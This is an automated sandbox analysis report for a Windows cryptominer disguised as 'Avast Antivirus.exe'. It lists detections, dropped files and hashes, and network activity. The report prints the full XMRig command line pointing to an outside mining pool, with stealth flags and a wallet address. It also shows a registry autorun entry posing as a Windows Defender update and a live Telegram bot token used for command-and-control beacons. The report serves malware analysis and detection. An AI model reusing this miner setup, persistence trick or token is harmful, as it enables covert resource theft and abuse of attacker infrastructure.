File name:

Avast Antivirus.exe

Full analysis: https://app.any.run/tasks/659b35fb-fd0c-482d-b4ca-cc9bc90a1198
Verdict: Malicious activity
Threats:

Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth.

Analysis date: May 20, 2025, 09:57:46
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
telegram
python
xmrig
miner
winring0x64-sys
vuln-driver
pyinstaller
arch-exec
ims-api
generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

142EAED307B5F36613F4183BEC66C4E7

SHA1:

5B06B75E7CB6166E0A9A5E4894E381233C63EC2C

SHA256:

0EF09A041D9D61D92E7E7429F1A087E07E518BBEBBFBF3AFD659DF062AAFD468

SSDEEP:

98304:54/XzVtpa+sENic7T8zKyv530/Vxmh7vSRpl89+bE9d9YbuvCjlhp4Tlcw15+EiK:7tCvTp5A

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • Avast Antivirus.exe (PID: 5728)
    • XMRIG has been detected

      • Avast Antivirus.exe (PID: 5728)
    • Vulnerable driver has been detected

      • Avast Antivirus.exe (PID: 5728)
    • XMRig has been detected

      • xmrig.exe (PID: 5156)
    • Looks like the application has launched a miner

      • Avast Antivirus.exe (PID: 5728)
  • SUSPICIOUS

    • The process drops C-runtime libraries

      • Avast Antivirus.exe (PID: 7148)
    • Process drops legitimate windows executable

      • Avast Antivirus.exe (PID: 7148)
    • Executable content was dropped or overwritten

      • Avast Antivirus.exe (PID: 7148)
      • Avast Antivirus.exe (PID: 5728)
    • Drops a system driver (possible attempt to evade defenses)

      • Avast Antivirus.exe (PID: 5728)
    • Application launched itself

      • Avast Antivirus.exe (PID: 7148)
    • Process drops python dynamic module

      • Avast Antivirus.exe (PID: 7148)
    • Loads Python modules

      • Avast Antivirus.exe (PID: 5728)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • Avast Antivirus.exe (PID: 5728)
    • There is functionality for taking screenshot (YARA)

      • Avast Antivirus.exe (PID: 7148)
      • Avast Antivirus.exe (PID: 5728)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • Avast Antivirus.exe (PID: 5728)
  • INFO

    • Reads the computer name

      • Avast Antivirus.exe (PID: 7148)
      • Avast Antivirus.exe (PID: 5728)
      • xmrig.exe (PID: 5156)
    • Checks supported languages

      • Avast Antivirus.exe (PID: 7148)
      • Avast Antivirus.exe (PID: 5728)
      • xmrig.exe (PID: 5156)
    • The sample compiled with english language support

      • Avast Antivirus.exe (PID: 7148)
    • Create files in a temporary directory

      • Avast Antivirus.exe (PID: 7148)
      • Avast Antivirus.exe (PID: 5728)
    • Reads the machine GUID from the registry

      • Avast Antivirus.exe (PID: 5728)
    • Creates files or folders in the user directory

      • Avast Antivirus.exe (PID: 5728)
    • Checks proxy server information

      • Avast Antivirus.exe (PID: 5728)
    • Attempting to use instant messaging service

      • Avast Antivirus.exe (PID: 5728)
    • PyInstaller has been detected (YARA)

      • Avast Antivirus.exe (PID: 7148)
      • Avast Antivirus.exe (PID: 5728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(5728) Avast Antivirus.exe
Telegram-Tokens (1)7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Telegram-Info-Links
7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Get info about bothttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getMe
Get incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getUpdates
Get webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook?drop_pending_updates=true
Telegram-Responses
oktrue
result
message_id1836
from
id7284188215
is_bottrue
first_nameMeow Bot
usernamemeow34jig4_robot
chat
id7781560881
first_nameTokyo
usernameregiontokyo
typeprivate
date1747735077
text🖥️ New Miner Activated - Host: DESKTOP-JGLLJLD - Wallet: 49KxcqRUduJMEKj5Lo5GWT52wHJBuuvbZCYnnpoR2btvh3x4iVWtDqdAd3q7hbA8Ez4GwpCvbt7gR2dzHprzncKhFr3XuT6
entities
offset4
length19
typebold
offset34
length15
typecode
offset60
length95
typecode
Telegram-Tokens (1)7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Telegram-Info-Links
7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Get info about bothttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getMe
Get incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getUpdates
Get webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
End-PointsendMessage
Args
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:18 20:14:34+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.36
CodeSize: 166400
InitializedDataSize: 154624
UninitializedDataSize: -
EntryPoint: 0xb340
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
132
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start avast antivirus.exe THREAT avast antivirus.exe #XMRIG xmrig.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
5156"C:\Users\admin\AppData\Roaming\Microsoft\Windows Defender\Platform\xmrig-6.20.0\xmrig.exe" -o stratum+tcp://gulf.mpool.pro:10128 -u 49KxcqRUduJMEKj5Lo5GWT52wHJBuuvbZCYnnpoR2btvh3x4iVWtDqdAd3q7hbA8Ez4GwpCvbt7gR2dzHprzncKhFr3XuT6.adaptive_worker --quiet --background --donate-level=0 --max-cpu-usage=50C:\Users\admin\AppData\Roaming\Microsoft\Windows Defender\Platform\xmrig-6.20.0\xmrig.exe
Avast Antivirus.exe
User:
admin
Company:
www.xmrig.com
Integrity Level:
MEDIUM
Description:
XMRig miner
Version:
6.20.0
Modules
Images
c:\users\admin\appdata\roaming\microsoft\windows defender\platform\xmrig-6.20.0\xmrig.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\iphlpapi.dll
5728"C:\Users\admin\Desktop\Avast Antivirus.exe" C:\Users\admin\Desktop\Avast Antivirus.exe
Avast Antivirus.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\avast antivirus.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
ims-api
(PID) Process(5728) Avast Antivirus.exe
Telegram-Tokens (1)7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Telegram-Info-Links
7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Get info about bothttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getMe
Get incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getUpdates
Get webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook?drop_pending_updates=true
(PID) Process(5728) Avast Antivirus.exe
Telegram-Responses
oktrue
result
message_id1836
from
id7284188215
is_bottrue
first_nameMeow Bot
usernamemeow34jig4_robot
chat
id7781560881
first_nameTokyo
usernameregiontokyo
typeprivate
date1747735077
text🖥️ New Miner Activated - Host: DESKTOP-JGLLJLD - Wallet: 49KxcqRUduJMEKj5Lo5GWT52wHJBuuvbZCYnnpoR2btvh3x4iVWtDqdAd3q7hbA8Ez4GwpCvbt7gR2dzHprzncKhFr3XuT6
entities
offset4
length19
typebold
offset34
length15
typecode
offset60
length95
typecode
(PID) Process(5728) Avast Antivirus.exe
Telegram-Tokens (1)7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Telegram-Info-Links
7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
Get info about bothttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getMe
Get incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getUpdates
Get webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7284188215:AAFFiwsvXla-f2a644TJpt9hICbbhxxw9rs
End-PointsendMessage
Args
7148"C:\Users\admin\Desktop\Avast Antivirus.exe" C:\Users\admin\Desktop\Avast Antivirus.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\avast antivirus.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
Total events
614
Read events
613
Write events
1
Delete events
0

Modification events

(PID) Process:(5728) Avast Antivirus.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:WindowsDefenderUpdate
Value:
C:\Users\admin\AppData\Roaming\Microsoft\Windows Defender\SecurityHealthService.exe
Executable files
18
Suspicious files
3
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\_bz2.pydexecutable
MD5:92075C2759AC8246953E6FA6323E43FE
SHA256:E7AF6119B56DDD47FD0A909710F7163D7EF4822405FC138D24E6CE9DE7A5022F
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\VCRUNTIME140.dllexecutable
MD5:0E675D4A7A5B7CCD69013386793F68EB
SHA256:BF5FF4603557C9959ACEC995653D052D9054AD4826DF967974EFD2F377C723D1
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\_ctypes.pydexecutable
MD5:2787764FE3056F37C79A3FC79E620172
SHA256:41C593C960F3F89B1E1629C6B7BD6171FE306168F816BEF02027332A263DE117
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\_hashlib.pydexecutable
MD5:7808B500FBFB17C968F10EE6D68461DF
SHA256:E2701F4E4A7556ADAB7415E448070289BA4FE047227F48C3A049D7C3154AFF0B
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\_lzma.pydexecutable
MD5:AB582419629183E1615B76FC5D2C7704
SHA256:5A45F7CD517AD396A042BC2767AE73221DC68F934E828A9433249924A371EE5E
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\_queue.pydexecutable
MD5:A48AF48DD880C11673469C1ADE525558
SHA256:A98E9F330EEAF40EF516237AB5BC1EFAC1FC49ED321A128BE78DD3FB8733E0A4
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\libssl-1_1.dllexecutable
MD5:FE1F3632AF98E7B7A2799E3973BA03CF
SHA256:1CE7BA99E817C1C2D71BC88A1BDD6FCAD82AA5C3E519B91EBD56C96F22E3543B
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\libcrypto-1_1.dllexecutable
MD5:BF83F8AD60CB9DB462CE62C73208A30D
SHA256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\python37.dllexecutable
MD5:C4E99D7375888D873D2478769A8D844C
SHA256:12F26BEB439DDF8D56E7544B06A0675D5DA6670C02F8F9CEDE7AAD1DE71EB116
7148Avast Antivirus.exeC:\Users\admin\AppData\Local\Temp\_MEI71482\select.pydexecutable
MD5:39B7C056BCA546778690B9922315F9FF
SHA256:9514B4C40C35396B1952A8ACF805E993A3875B37370F44EF36ED33C7151412EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
22
DNS requests
28
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1228
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1228
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5728
Avast Antivirus.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
whitelisted
5728
Avast Antivirus.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
5728
Avast Antivirus.exe
185.199.108.133:443
objects.githubusercontent.com
FASTLY
US
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
40.126.32.140:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
google.com
  • 142.250.185.238
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 95.101.149.131
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
github.com
  • 140.82.121.4
whitelisted
objects.githubusercontent.com
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.109.133
  • 185.199.110.133
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
gulf.mpool.pro
unknown
login.live.com
  • 40.126.32.140
  • 20.190.160.3
  • 20.190.160.67
  • 40.126.32.68
  • 20.190.160.66
  • 40.126.32.136
  • 20.190.160.64
  • 40.126.32.138
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
5728
Avast Antivirus.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
No debug info